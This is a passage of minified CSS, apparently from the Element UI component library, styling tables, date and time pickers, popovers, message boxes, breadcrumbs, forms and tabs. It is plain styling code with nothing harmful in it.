th.el-table__cell.is-sortable{cursor:pointer}.el-table th.el-table__cell{overflow:hidden;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;background-color:#fff}.el-table th.el-table__cell>.cell{display:inline-block;-webkit-box-sizing:border-box;box-sizing:border-box;position:relative;vertical-align:middle;padding-left:10px;padding-right:10px;width:100%}.el-table th.el-table__cell>.cell.highlight{color:#409eff}.el-table th.el-table__cell.required>div:before{display:inline-block;content:"";width:8px;height:8px;border-radius:50%;background:#ff4d51;margin-right:5px;vertical-align:middle}.el-table td.el-table__cell div{-webkit-box-sizing:border-box;box-sizing:border-box}.el-table td.el-table__cell.gutter{width:0}.el-table .cell{box-sizing:border-box;overflow:hidden;text-overflow:ellipsis;white-space:normal;word-break:break-all;line-height:23px;padding-left:10px;padding-right:10px}.el-date-table td,.el-date-table td div,.el-table-filter,.el-table .cell{-webkit-box-sizing:border-box}.el-table .cell.el-tooltip{white-space:nowrap;min-width:50px}.el-table--border,.el-table--group{border:1px solid #ebeef5}.el-table--border:after,.el-table--group:after,.el-table:before{content:"";position:absolute;background-color:#ebeef5;z-index:1}.el-table--border:after,.el-table--group:after{top:0;right:0;width:1px;height:100%}.el-table:before{left:0;bottom:0;width:100%;height:1px}.el-table--border{border-right:none;border-bottom:none}.el-table--border.el-loading-parent--relative{border-color:transparent}.el-table--border .el-table__cell,.el-table__body-wrapper .el-table--border.is-scrolling-left~.el-table__fixed{border-right:1px solid #ebeef5}.el-table--border .el-table__cell:first-child .cell{padding-left:10px}.el-table--border th.el-table__cell.gutter:last-of-type{border-bottom:1px solid #ebeef5;border-bottom-width:1px}.el-table--border th.el-table__cell,.el-table__fixed-right-patch{border-bottom:1px solid #ebeef5}.el-table--hidden{visibility:hidden}.el-table__fixed,.el-table__fixed-right{position:absolute;top:0;left:0;overflow-x:hidden;overflow-y:hidden;-webkit-box-shadow:0 0 10px rgba(0,0,0,.12);box-shadow:0 0 10px rgba(0,0,0,.12)}.el-table__fixed-right:before,.el-table__fixed:before{content:"";position:absolute;left:0;bottom:0;width:100%;height:1px;background-color:#ebeef5;z-index:4}.el-table__fixed-right-patch{position:absolute;top:-1px;right:0;background-color:#fff}.el-table__fixed-right{top:0;left:auto;right:0}.el-table__fixed-right .el-table__fixed-body-wrapper,.el-table__fixed-right .el-table__fixed-footer-wrapper,.el-table__fixed-right .el-table__fixed-header-wrapper{left:auto;right:0}.el-table__fixed-header-wrapper{position:absolute;left:0;top:0;z-index:3}.el-table__fixed-footer-wrapper{position:absolute;left:0;bottom:0;z-index:3}.el-table__fixed-footer-wrapper tbody td.el-table__cell{border-top:1px solid #ebeef5;background-color:#f5f7fa;color:#606266}.el-table__fixed-body-wrapper{position:absolute;left:0;top:37px;overflow:hidden;z-index:3}.el-table__body-wrapper,.el-table__footer-wrapper,.el-table__header-wrapper{width:100%}.el-table__footer-wrapper{margin-top:-1px}.el-table__footer-wrapper td.el-table__cell{border-top:1px solid #ebeef5}.el-table__body,.el-table__footer,.el-table__header{table-layout:fixed;border-collapse:separate}.el-table__footer-wrapper,.el-table__header-wrapper{overflow:hidden}.el-table__footer-wrapper tbody td.el-table__cell,.el-table__header-wrapper tbody td.el-table__cell{background-color:#f5f7fa;color:#606266}.el-table__body-wrapper{overflow:hidden;position:relative}.el-table__body-wrapper.is-scrolling-left~.el-table__fixed,.el-table__body-wrapper.is-scrolling-none~.el-table__fixed,.el-table__body-wrapper.is-scrolling-none~.el-table__fixed-right,.el-table__body-wrapper.is-scrolling-right~.el-table__fixed-right{-webkit-box-shadow:none;box-shadow:none}.el-table__body-wrapper .el-table--border.is-scrolling-right~.el-table__fixed-right{border-left:1px solid #ebeef5}.el-table .caret-wrapper{display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-align:center;-ms-flex-align:center;align-items:center;height:34px;width:24px;vertical-align:middle;cursor:pointer;overflow:initial;position:relative}.el-table .sort-caret{width:0;height:0;border:5px solid transparent;position:absolute;left:7px}.el-table .sort-caret.ascending{border-bottom-color:#c0c4cc;top:5px}.el-table .sort-caret.descending{border-top-color:#c0c4cc;bottom:7px}.el-table .ascending .sort-caret.ascending{border-bottom-color:#409eff}.el-table .descending .sort-caret.descending{border-top-color:#409eff}.el-table .hidden-columns{visibility:hidden;position:absolute;z-index:-1}.el-table--striped .el-table__body tr.el-table__row--striped td.el-table__cell{background:#fafafa}.el-table--striped .el-table__body tr.el-table__row--striped.current-row td.el-table__cell{background-color:#ecf5ff}.el-table__body tr.hover-row.current-row>td.el-table__cell,.el-table__body tr.hover-row.el-table__row--striped.current-row>td.el-table__cell,.el-table__body tr.hover-row.el-table__row--striped>td.el-table__cell,.el-table__body tr.hover-row>td.el-table__cell{background-color:#f5f7fa}.el-table__body tr.current-row>td.el-table__cell{background-color:#ecf5ff}.el-table__column-resize-proxy{position:absolute;left:200px;top:0;bottom:0;width:0;border-left:1px solid #ebeef5;z-index:10}.el-table__column-filter-trigger{display:inline-block;line-height:34px;cursor:pointer}.el-table__column-filter-trigger i{color:#909399;font-size:12px;-webkit-transform:scale(.75);transform:scale(.75)}.el-table--enable-row-transition .el-table__body td.el-table__cell{-webkit-transition:background-color .25s ease;transition:background-color .25s ease}.el-table--enable-row-hover .el-table__body tr:hover>td.el-table__cell{background-color:#f5f7fa}.el-table--fluid-height .el-table__fixed,.el-table--fluid-height .el-table__fixed-right{bottom:0;overflow:hidden}.el-table [class*=el-table__row--level] .el-table__expand-icon{display:inline-block;width:20px;line-height:20px;height:20px;text-align:center;margin-right:3px}.el-table-column--selection .cell{padding-left:14px;padding-right:14px}.el-table-filter{border:1px solid #ebeef5;border-radius:2px;background-color:#fff;-webkit-box-shadow:0 2px 12px 0 rgba(0,0,0,.1);box-shadow:0 2px 12px 0 rgba(0,0,0,.1);-webkit-box-sizing:border-box;box-sizing:border-box;margin:2px 0}.el-table-filter__list{padding:5px 0;margin:0;list-style:none;min-width:100px}.el-table-filter__list-item{line-height:36px;padding:0 10px;cursor:pointer;font-size:14px}.el-table-filter__list-item:hover{background-color:#ecf5ff;color:#66b1ff}.el-table-filter__list-item.is-active{background-color:#409eff;color:#fff}.el-table-filter__content{min-width:100px}.el-table-filter__bottom{border-top:1px solid #ebeef5;padding:8px}.el-table-filter__bottom button{background:0 0;border:none;color:#606266;cursor:pointer;font-size:13px;padding:0 3px}.el-date-table.is-week-mode .el-date-table__row.current div,.el-date-table.is-week-mode .el-date-table__row:hover div,.el-date-table td.in-range div,.el-date-table td.in-range div:hover{background-color:#f2f6fc}.el-table-filter__bottom button:hover{color:#409eff}.el-table-filter__bottom button:focus{outline:0}.el-table-filter__bottom button.is-disabled{color:#c0c4cc;cursor:not-allowed}.el-table-filter__wrap{max-height:280px}.el-table-filter__checkbox-group{padding:10px}.el-table-filter__checkbox-group label.el-checkbox{display:block;margin-right:5px;margin-bottom:8px;margin-left:5px}.el-table-filter__checkbox-group .el-checkbox:last-child{margin-bottom:0}.el-date-table{font-size:12px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.el-date-table.is-week-mode .el-date-table__row:hover td.available:hover{color:#606266}.el-date-table.is-week-mode .el-date-table__row:hover td:first-child div{margin-left:5px;border-top-left-radius:15px;border-bottom-left-radius:15px}.el-date-table.is-week-mode .el-date-table__row:hover td:last-child div{margin-right:5px;border-top-right-radius:15px;border-bottom-right-radius:15px}.el-date-table td{width:32px;padding:4px 0;text-align:center;cursor:pointer;position:relative}.el-date-table td,.el-date-table td div{height:30px;-webkit-box-sizing:border-box;box-sizing:border-box}.el-date-table td div{padding:3px 0}.el-date-table td span{width:24px;height:24px;display:block;margin:0 auto;line-height:24px;position:absolute;left:50%;-webkit-transform:translateX(-50%);transform:translateX(-50%);border-radius:50%}.el-date-table td.next-month,.el-date-table td.prev-month{color:#c0c4cc}.el-date-table td.today{position:relative}.el-date-table td.today span{color:#409eff;font-weight:700}.el-date-table td.today.end-date span,.el-date-table td.today.start-date span{color:#fff}.el-date-table td.available:hover{color:#409eff}.el-date-table td.current:not(.disabled) span{color:#fff;background-color:#409eff}.el-date-table td.end-date div,.el-date-table td.start-date div{color:#fff}.el-date-table td.end-date span,.el-date-table td.start-date span{background-color:#409eff}.el-date-table td.start-date div{margin-left:5px;border-top-left-radius:15px;border-bottom-left-radius:15px}.el-date-table td.end-date div{margin-right:5px;border-top-right-radius:15px;border-bottom-right-radius:15px}.el-date-table td.disabled div{background-color:#f5f7fa;opacity:1;cursor:not-allowed;color:#c0c4cc}.el-date-table td.selected div{margin-left:5px;margin-right:5px;background-color:#f2f6fc;border-radius:15px}.el-date-table td.selected div:hover{background-color:#f2f6fc}.el-date-table td.selected span{background-color:#409eff;color:#fff;border-radius:15px}.el-date-table td.week{font-size:80%;color:#606266}.el-date-table th{padding:5px;color:#606266;font-weight:400;border-bottom:1px solid #ebeef5}.el-month-table{font-size:12px;margin:-1px;border-collapse:collapse}.el-month-table td{text-align:center;padding:8px 0;cursor:pointer}.el-month-table td div{height:48px;padding:6px 0;-webkit-box-sizing:border-box;box-sizing:border-box}.el-month-table td.today .cell{color:#409eff;font-weight:700}.el-month-table td.today.end-date .cell,.el-month-table td.today.start-date .cell{color:#fff}.el-month-table td.disabled .cell{background-color:#f5f7fa;cursor:not-allowed;color:#c0c4cc}.el-month-table td.disabled .cell:hover{color:#c0c4cc}.el-month-table td .cell{width:60px;height:36px;display:block;line-height:36px;color:#606266;margin:0 auto;border-radius:18px}.el-month-table td .cell:hover{color:#409eff}.el-month-table td.in-range div,.el-month-table td.in-range div:hover{background-color:#f2f6fc}.el-month-table td.end-date div,.el-month-table td.start-date div{color:#fff}.el-month-table td.end-date .cell,.el-month-table td.start-date .cell{color:#fff;background-color:#409eff}.el-month-table td.start-date div{border-top-left-radius:24px;border-bottom-left-radius:24px}.el-month-table td.end-date div{border-top-right-radius:24px;border-bottom-right-radius:24px}.el-month-table td.current:not(.disabled) .cell{color:#409eff}.el-year-table{font-size:12px;margin:-1px;border-collapse:collapse}.el-year-table .el-icon{color:#303133}.el-year-table td{text-align:center;padding:20px 3px;cursor:pointer}.el-year-table td.today .cell{color:#409eff;font-weight:700}.el-year-table td.disabled .cell{background-color:#f5f7fa;cursor:not-allowed;color:#c0c4cc}.el-year-table td.disabled .cell:hover{color:#c0c4cc}.el-year-table td .cell{width:48px;height:32px;display:block;line-height:32px;color:#606266;margin:0 auto}.el-year-table td .cell:hover,.el-year-table td.current:not(.disabled) .cell{color:#409eff}.el-date-range-picker{width:646px}.el-date-range-picker.has-sidebar{width:756px}.el-date-range-picker table{table-layout:fixed;width:100%}.el-date-range-picker .el-picker-panel__body{min-width:513px}.el-date-range-picker .el-picker-panel__content{margin:0}.el-date-range-picker__header{position:relative;text-align:center;height:28px}.el-date-range-picker__header [class*=arrow-left]{float:left}.el-date-range-picker__header [class*=arrow-right]{float:right}.el-date-range-picker__header div{font-size:16px;font-weight:500;margin-right:50px}.el-date-range-picker__content{float:left;width:50%;-webkit-box-sizing:border-box;box-sizing:border-box;margin:0;padding:16px}.el-date-range-picker__content.is-left{border-right:1px solid #e4e4e4}.el-date-range-picker__content .el-date-range-picker__header div{margin-left:50px;margin-right:50px}.el-date-range-picker__editors-wrap{-webkit-box-sizing:border-box;box-sizing:border-box;display:table-cell}.el-date-range-picker__editors-wrap.is-right{text-align:right}.el-date-range-picker__time-header{position:relative;border-bottom:1px solid #e4e4e4;font-size:12px;padding:8px 5px 5px;display:table;width:100%;-webkit-box-sizing:border-box;box-sizing:border-box}.el-date-range-picker__time-header>.el-icon-arrow-right{font-size:20px;vertical-align:middle;display:table-cell;color:#303133}.el-date-range-picker__time-picker-wrap{position:relative;display:table-cell;padding:0 5px}.el-date-range-picker__time-picker-wrap .el-picker-panel{position:absolute;top:13px;right:0;z-index:1;background:#fff}.el-date-picker{width:322px}.el-date-picker.has-sidebar.has-time{width:434px}.el-date-picker.has-sidebar{width:438px}.el-date-picker.has-time .el-picker-panel__body-wrapper{position:relative}.el-date-picker .el-picker-panel__content{width:292px}.el-date-picker table{table-layout:fixed;width:100%}.el-date-picker__editor-wrap{position:relative;display:table-cell;padding:0 5px}.el-date-picker__time-header{position:relative;border-bottom:1px solid #e4e4e4;font-size:12px;padding:8px 5px 5px;display:table;width:100%;-webkit-box-sizing:border-box;box-sizing:border-box}.el-date-picker__header{margin:12px;text-align:center}.el-date-picker__header--bordered{margin-bottom:0;padding-bottom:12px;border-bottom:1px solid #ebeef5}.el-date-picker__header--bordered+.el-picker-panel__content{margin-top:0}.el-date-picker__header-label{font-size:16px;font-weight:500;padding:0 5px;line-height:22px;text-align:center;cursor:pointer;color:#606266}.el-date-picker__header-label.active,.el-date-picker__header-label:hover{color:#409eff}.el-date-picker__prev-btn{float:left}.el-date-picker__next-btn{float:right}.el-date-picker__time-wrap{padding:10px;text-align:center}.el-date-picker__time-label{float:left;cursor:pointer;line-height:30px;margin-left:10px}.time-select{margin:5px 0;min-width:0}.time-select .el-picker-panel__content{max-height:200px;margin:0}.time-select-item{padding:8px 10px;font-size:14px;line-height:20px}.time-select-item.selected:not(.disabled){color:#409eff;font-weight:700}.time-select-item.disabled{color:#e4e7ed;cursor:not-allowed}.time-select-item:hover{background-color:#f5f7fa;font-weight:700;cursor:pointer}.el-date-editor{position:relative;display:inline-block;text-align:left}.el-date-editor.el-input,.el-date-editor.el-input__inner{width:220px}.el-date-editor--monthrange.el-input,.el-date-editor--monthrange.el-input__inner{width:300px}.el-date-editor--daterange.el-input,.el-date-editor--daterange.el-input__inner,.el-date-editor--timerange.el-input,.el-date-editor--timerange.el-input__inner{width:350px}.el-date-editor--datetimerange.el-input,.el-date-editor--datetimerange.el-input__inner{width:400px}.el-date-editor--dates .el-input__inner{text-overflow:ellipsis;white-space:nowrap}.el-date-editor .el-icon-circle-close{cursor:pointer}.el-date-editor .el-range__icon{font-size:14px;margin-left:-5px;color:#c0c4cc;float:left;line-height:32px}.el-date-editor .el-range-input{-webkit-appearance:none;-moz-appearance:none;appearance:none;border:none;outline:0;display:inline-block;height:100%;margin:0;padding:0;width:39%;text-align:center;font-size:14px;color:#606266}.el-date-editor .el-range-input::-webkit-input-placeholder{color:#c0c4cc}.el-date-editor .el-range-input:-ms-input-placeholder{color:#c0c4cc}.el-date-editor .el-range-input::-ms-input-placeholder{color:#c0c4cc}.el-date-editor .el-range-input::-moz-placeholder{color:#c0c4cc}.el-date-editor .el-range-input::placeholder{color:#c0c4cc}.el-date-editor .el-range-separator{display:inline-block;height:100%;padding:0 5px;margin:0;text-align:center;line-height:32px;font-size:14px;width:5%;color:#303133}.el-date-editor .el-range__close-icon{font-size:14px;color:#c0c4cc;width:25px;display:inline-block;float:right;line-height:32px}.el-range-editor.el-input__inner{display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:3px 10px}.el-range-editor .el-range-input{line-height:1}.el-range-editor--medium.el-input__inner{height:36px}.el-range-editor--medium .el-range-separator{line-height:28px;font-size:14px}.el-range-editor--medium .el-range-input{font-size:14px}.el-range-editor--medium .el-range__close-icon,.el-range-editor--medium .el-range__icon{line-height:28px}.el-range-editor--small.el-input__inner{height:32px}.el-range-editor--small .el-range-separator{line-height:24px;font-size:13px}.el-range-editor--small .el-range-input{font-size:13px}.el-range-editor--small .el-range__close-icon,.el-range-editor--small .el-range__icon{line-height:24px}.el-range-editor--mini.el-input__inner{height:28px}.el-range-editor--mini .el-range-separator{line-height:20px;font-size:12px}.el-range-editor--mini .el-range-input{font-size:12px}.el-range-editor--mini .el-range__close-icon,.el-range-editor--mini .el-range__icon{line-height:20px}.el-range-editor.is-disabled{background-color:#f5f7fa;border-color:#e4e7ed;color:#c0c4cc;cursor:not-allowed}.el-range-editor.is-disabled:focus,.el-range-editor.is-disabled:hover{border-color:#e4e7ed}.el-range-editor.is-disabled input{background-color:#f5f7fa;color:#c0c4cc;cursor:not-allowed}.el-range-editor.is-disabled input::-webkit-input-placeholder{color:#c0c4cc}.el-range-editor.is-disabled input:-ms-input-placeholder{color:#c0c4cc}.el-range-editor.is-disabled input::-ms-input-placeholder{color:#c0c4cc}.el-range-editor.is-disabled input::-moz-placeholder{color:#c0c4cc}.el-range-editor.is-disabled input::placeholder{color:#c0c4cc}.el-range-editor.is-disabled .el-range-separator{color:#c0c4cc}.el-picker-panel{color:#606266;border:1px solid #e4e7ed;-webkit-box-shadow:0 2px 12px 0 rgba(0,0,0,.1);box-shadow:0 2px 12px 0 rgba(0,0,0,.1);background:#fff;border-radius:4px;line-height:30px;margin:5px 0}.el-picker-panel__body-wrapper:after,.el-picker-panel__body:after{content:"";display:table;clear:both}.el-picker-panel__content{position:relative;margin:15px}.el-picker-panel__footer{border-top:1px solid #e4e4e4;padding:4px;text-align:right;background-color:#fff;position:relative;font-size:0}.el-picker-panel__shortcut{display:block;width:100%;border:0;background-color:transparent;line-height:28px;font-size:14px;color:#606266;padding-left:12px;text-align:left;outline:0;cursor:pointer}.el-picker-panel__shortcut:hover{color:#409eff}.el-picker-panel__shortcut.active{background-color:#e6f1fe;color:#409eff}.el-picker-panel__btn{border:1px solid #dcdcdc;color:#333;line-height:24px;border-radius:2px;padding:0 20px;cursor:pointer;background-color:transparent;outline:0;font-size:12px}.el-picker-panel__btn[disabled]{color:#ccc;cursor:not-allowed}.el-picker-panel__icon-btn{font-size:12px;color:#303133;border:0;background:0 0;cursor:pointer;outline:0;margin-top:8px}.el-picker-panel__icon-btn:hover{color:#409eff}.el-picker-panel__icon-btn.is-disabled{color:#bbb}.el-picker-panel__icon-btn.is-disabled:hover{cursor:not-allowed}.el-picker-panel__link-btn{vertical-align:middle}.el-picker-panel [slot=sidebar],.el-picker-panel__sidebar{position:absolute;top:0;bottom:0;width:110px;border-right:1px solid #e4e4e4;-webkit-box-sizing:border-box;box-sizing:border-box;padding-top:6px;background-color:#fff;overflow:auto}.el-picker-panel [slot=sidebar]+.el-picker-panel__body,.el-picker-panel__sidebar+.el-picker-panel__body{margin-left:110px}.el-time-spinner.has-seconds .el-time-spinner__wrapper{width:33.3%}.el-time-spinner__wrapper{max-height:190px;overflow:auto;display:inline-block;width:50%;vertical-align:top;position:relative}.el-time-spinner__wrapper .el-scrollbar__wrap:not(.el-scrollbar__wrap--hidden-default){padding-bottom:15px}.el-time-spinner__input.el-input .el-input__inner,.el-time-spinner__list{padding:0;text-align:center}.el-time-spinner__wrapper.is-arrow{-webkit-box-sizing:border-box;box-sizing:border-box;text-align:center;overflow:hidden}.el-time-spinner__wrapper.is-arrow .el-time-spinner__list{-webkit-transform:translateY(-32px);transform:translateY(-32px)}.el-time-spinner__wrapper.is-arrow .el-time-spinner__item:hover:not(.disabled):not(.active){background:#fff;cursor:default}.el-time-spinner__arrow{font-size:12px;color:#909399;position:absolute;left:0;width:100%;z-index:1;text-align:center;height:30px;line-height:30px;cursor:pointer}.el-time-spinner__arrow:hover{color:#409eff}.el-time-spinner__arrow.el-icon-arrow-up{top:10px}.el-time-spinner__arrow.el-icon-arrow-down{bottom:10px}.el-time-spinner__input.el-input{width:70%}.el-time-spinner__list{margin:0;list-style:none}.el-time-spinner__list:after,.el-time-spinner__list:before{content:"";display:block;width:100%;height:80px}.el-time-spinner__item{height:32px;line-height:32px;font-size:12px;color:#606266}.el-time-spinner__item:hover:not(.disabled):not(.active){background:#f5f7fa;cursor:pointer}.el-time-spinner__item.active:not(.disabled){color:#303133;font-weight:700}.el-time-spinner__item.disabled{color:#c0c4cc;cursor:not-allowed}.el-time-panel{margin:5px 0;border:1px solid #e4e7ed;background-color:#fff;-webkit-box-shadow:0 2px 12px 0 rgba(0,0,0,.1);box-shadow:0 2px 12px 0 rgba(0,0,0,.1);border-radius:2px;position:absolute;width:180px;left:0;z-index:1000;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-webkit-box-sizing:content-box;box-sizing:content-box}.el-time-panel__content{font-size:0;position:relative;overflow:hidden}.el-time-panel__content:after,.el-time-panel__content:before{content:"";top:50%;position:absolute;margin-top:-15px;height:32px;z-index:-1;left:0;right:0;-webkit-box-sizing:border-box;box-sizing:border-box;padding-top:6px;text-align:left;border-top:1px solid #e4e7ed;border-bottom:1px solid #e4e7ed}.el-form-item__label,.el-tabs__item,.el-tabs__nav-wrap.is-scrollable,.el-time-panel__footer,.el-time-range-picker__cell{-webkit-box-sizing:border-box}.el-time-panel__content:after{left:50%;margin-left:12%;margin-right:12%}.el-time-panel__content:before{padding-left:50%;margin-right:12%;margin-left:12%}.el-time-panel__content.has-seconds:after{left:66.66667%}.el-time-panel__content.has-seconds:before{padding-left:33.33333%}.el-time-panel__footer{border-top:1px solid #e4e4e4;padding:4px;height:36px;line-height:25px;text-align:right;-webkit-box-sizing:border-box;box-sizing:border-box}.el-time-panel__btn{border:none;line-height:28px;padding:0 5px;margin:0 5px;cursor:pointer;background-color:transparent;outline:0;font-size:12px;color:#303133}.el-time-panel__btn.confirm{font-weight:800;color:#409eff}.el-time-range-picker{width:354px;overflow:visible}.el-time-range-picker__content{position:relative;text-align:center;padding:10px}.el-time-range-picker__cell{-webkit-box-sizing:border-box;box-sizing:border-box;margin:0;padding:4px 7px 7px;width:50%;display:inline-block}.el-time-range-picker__header{margin-bottom:5px;text-align:center;font-size:14px}.el-time-range-picker__body{border-radius:2px;border:1px solid #e4e7ed}.el-popover{position:absolute;background:#fff;min-width:150px;border-radius:4px;border:1px solid #ebeef5;padding:12px;z-index:2000;color:#606266;line-height:1.4;text-align:justify;font-size:14px;box-shadow:0 2px 12px 0 rgba(0,0,0,.1);word-break:break-all}.el-card.is-always-shadow,.el-card.is-hover-shadow:focus,.el-card.is-hover-shadow:hover,.el-cascader__dropdown,.el-color-picker__panel,.el-message-box,.el-notification,.el-popover{-webkit-box-shadow:0 2px 12px 0 rgba(0,0,0,.1)}.el-popover--plain{padding:18px 20px}.el-popover__title{color:#303133;font-size:16px;line-height:1;margin-bottom:12px}.el-popover:focus,.el-popover:focus:active,.el-popover__reference:focus:hover,.el-popover__reference:focus:not(.focusing){outline-width:0}.v-modal-enter{-webkit-animation:v-modal-in .2s ease;animation:v-modal-in .2s ease}.v-modal-leave{-webkit-animation:v-modal-out .2s ease forwards;animation:v-modal-out .2s ease forwards}@keyframes v-modal-in{0%{opacity:0}}@keyframes v-modal-out{to{opacity:0}}.v-modal{position:fixed;left:0;top:0;width:100%;height:100%;opacity:.5;background:#000}.el-popup-parent--hidden{overflow:hidden}.el-message-box{display:inline-block;width:420px;padding-bottom:10px;vertical-align:middle;background-color:#fff;border-radius:4px;border:1px solid #ebeef5;font-size:18px;-webkit-box-shadow:0 2px 12px 0 rgba(0,0,0,.1);box-shadow:0 2px 12px 0 rgba(0,0,0,.1);text-align:left;overflow:hidden;-webkit-backface-visibility:hidden;backface-visibility:hidden}.el-message-box__wrapper{position:fixed;top:0;bottom:0;left:0;right:0;text-align:center}.el-message-box__wrapper:after{content:"";display:inline-block;height:100%;width:0;vertical-align:middle}.el-message-box__header{position:relative;padding:15px 15px 10px}.el-message-box__title{padding-left:0;margin-bottom:0;font-size:18px;line-height:1;color:#303133}.el-message-box__headerbtn{position:absolute;top:15px;right:15px;padding:0;border:none;outline:0;background:0 0;font-size:16px;cursor:pointer}.el-form-item.is-error .el-input__inner,.el-form-item.is-error .el-input__inner:focus,.el-form-item.is-error .el-textarea__inner,.el-form-item.is-error .el-textarea__inner:focus,.el-message-box__input input.invalid,.el-message-box__input input.invalid:focus{border-color:#f56c6c}.el-message-box__headerbtn .el-message-box__close{color:#909399}.el-message-box__headerbtn:focus .el-message-box__close,.el-message-box__headerbtn:hover .el-message-box__close{color:#409eff}.el-message-box__content{padding:10px 15px;color:#606266;font-size:14px}.el-message-box__container{position:relative}.el-message-box__input{padding-top:15px}.el-message-box__status{position:absolute;top:50%;-webkit-transform:translateY(-50%);transform:translateY(-50%);font-size:24px!important}.el-message-box__status:before{padding-left:1px}.el-message-box__status+.el-message-box__message{padding-left:36px;padding-right:12px}.el-message-box__status.el-icon-success{color:#67c23a}.el-message-box__status.el-icon-info{color:#909399}.el-message-box__status.el-icon-warning{color:#e6a23c}.el-message-box__status.el-icon-error{color:#f56c6c}.el-message-box__message{margin:0}.el-message-box__message p{margin:0;line-height:24px}.el-message-box__errormsg{color:#f56c6c;font-size:12px;min-height:18px;margin-top:2px}.el-message-box__btns{padding:5px 15px 0;text-align:right}.el-message-box__btns button:nth-child(2){margin-left:10px}.el-message-box__btns-reverse{-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.el-message-box--center{padding-bottom:30px}.el-message-box--center .el-message-box__header{padding-top:30px}.el-message-box--center .el-message-box__title{position:relative;display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center}.el-message-box--center .el-message-box__status{position:relative;top:auto;padding-right:5px;text-align:center;-webkit-transform:translateY(-1px);transform:translateY(-1px)}.el-message-box--center .el-message-box__message{margin-left:0}.el-message-box--center .el-message-box__btns,.el-message-box--center .el-message-box__content{text-align:center}.el-message-box--center .el-message-box__content{padding-left:27px;padding-right:27px}.msgbox-fade-enter-active{-webkit-animation:msgbox-fade-in .3s;animation:msgbox-fade-in .3s}.msgbox-fade-leave-active{-webkit-animation:msgbox-fade-out .3s;animation:msgbox-fade-out .3s}@-webkit-keyframes msgbox-fade-in{0%{-webkit-transform:translate3d(0,-20px,0);transform:translate3d(0,-20px,0);opacity:0}to{-webkit-transform:translateZ(0);transform:translateZ(0);opacity:1}}@keyframes msgbox-fade-in{0%{-webkit-transform:translate3d(0,-20px,0);transform:translate3d(0,-20px,0);opacity:0}to{-webkit-transform:translateZ(0);transform:translateZ(0);opacity:1}}@-webkit-keyframes msgbox-fade-out{0%{-webkit-transform:translateZ(0);transform:translateZ(0);opacity:1}to{-webkit-transform:translate3d(0,-20px,0);transform:translate3d(0,-20px,0);opacity:0}}@keyframes msgbox-fade-out{0%{-webkit-transform:translateZ(0);transform:translateZ(0);opacity:1}to{-webkit-transform:translate3d(0,-20px,0);transform:translate3d(0,-20px,0);opacity:0}}.el-breadcrumb{font-size:14px;line-height:1}.el-breadcrumb:after,.el-breadcrumb:before{display:table;content:""}.el-breadcrumb:after{clear:both}.el-breadcrumb__separator{margin:0 9px;font-weight:700;color:#c0c4cc}.el-breadcrumb__separator[class*=icon]{margin:0 6px;font-weight:400}.el-breadcrumb__item{float:left}.el-breadcrumb__inner{color:#606266}.el-breadcrumb__inner.is-link,.el-breadcrumb__inner a{font-weight:700;text-decoration:none;-webkit-transition:color .2s cubic-bezier(.645,.045,.355,1);transition:color .2s cubic-bezier(.645,.045,.355,1);color:#303133}.el-breadcrumb__inner.is-link:hover,.el-breadcrumb__inner a:hover{color:#409eff;cursor:pointer}.el-breadcrumb__item:last-child .el-breadcrumb__inner,.el-breadcrumb__item:last-child .el-breadcrumb__inner:hover,.el-breadcrumb__item:last-child .el-breadcrumb__inner a,.el-breadcrumb__item:last-child .el-breadcrumb__inner a:hover{font-weight:400;color:#606266;cursor:text}.el-breadcrumb__item:last-child .el-breadcrumb__separator{display:none}.el-form--label-left .el-form-item__label{text-align:left}.el-form--label-top .el-form-item__label{float:none;display:inline-block;text-align:left;padding:0 0 10px}.el-form--inline .el-form-item{display:inline-block;margin-right:10px;vertical-align:top}.el-form--inline .el-form-item__label{float:none;display:inline-block}.el-form--inline .el-form-item__content{display:inline-block;vertical-align:top}.el-form--inline.el-form--label-top .el-form-item__content{display:block}.el-form-item{margin-bottom:22px}.el-form-item:after,.el-form-item:before{display:table;content:""}.el-form-item:after{clear:both}.el-form-item .el-form-item{margin-bottom:0}.el-form-item--mini.el-form-item,.el-form-item--small.el-form-item{margin-bottom:18px}.el-form-item .el-input__validateIcon{display:none}.el-form-item--medium .el-form-item__content,.el-form-item--medium .el-form-item__label{line-height:36px}.el-form-item--small .el-form-item__content,.el-form-item--small .el-form-item__label{line-height:32px}.el-form-item--small .el-form-item__error{padding-top:2px}.el-form-item--mini .el-form-item__content,.el-form-item--mini .el-form-item__label{line-height:28px}.el-form-item--mini .el-form-item__error{padding-top:1px}.el-form-item__label-wrap{float:left}.el-form-item__label-wrap .el-form-item__label{display:inline-block;float:none}.el-form-item__label{text-align:right;vertical-align:middle;float:left;font-size:14px;color:#606266;line-height:40px;padding:0 12px 0 0;-webkit-box-sizing:border-box;box-sizing:border-box}.el-form-item__content{line-height:40px;position:relative;font-size:14px}.el-form-item__content:after,.el-form-item__content:before{display:table;content:""}.el-form-item__content:after{clear:both}.el-form-item__content .el-input-group{vertical-align:top}.el-form-item__error{color:#f56c6c;font-size:12px;line-height:1;padding-top:4px;position:absolute;top:100%;left:0}.el-form-item__error--inline{position:relative;top:auto;left:auto;display:inline-block;margin-left:10px}.el-form-item.is-required:not(.is-no-asterisk) .el-form-item__label-wrap>.el-form-item__label:before,.el-form-item.is-required:not(.is-no-asterisk)>.el-form-item__label:before{content:"*";color:#f56c6c;margin-right:4px}.el-form-item.is-error .el-input-group__append .el-input__inner,.el-form-item.is-error .el-input-group__prepend .el-input__inner{border-color:transparent}.el-form-item.is-error .el-input__validateIcon{color:#f56c6c}.el-form-item--feedback .el-input__validateIcon{display:inline-block}.el-tabs__header{padding:0;position:relative;margin:0 0 15px}.el-tabs__active-bar{position:absolute;bottom:0;left:0;height:2px;background-color:#409eff;z-index:1;-webkit-transition:-webkit-transform .3s cubic-bezier(.645,.045,.355,1);transition:-webkit-transform .3s 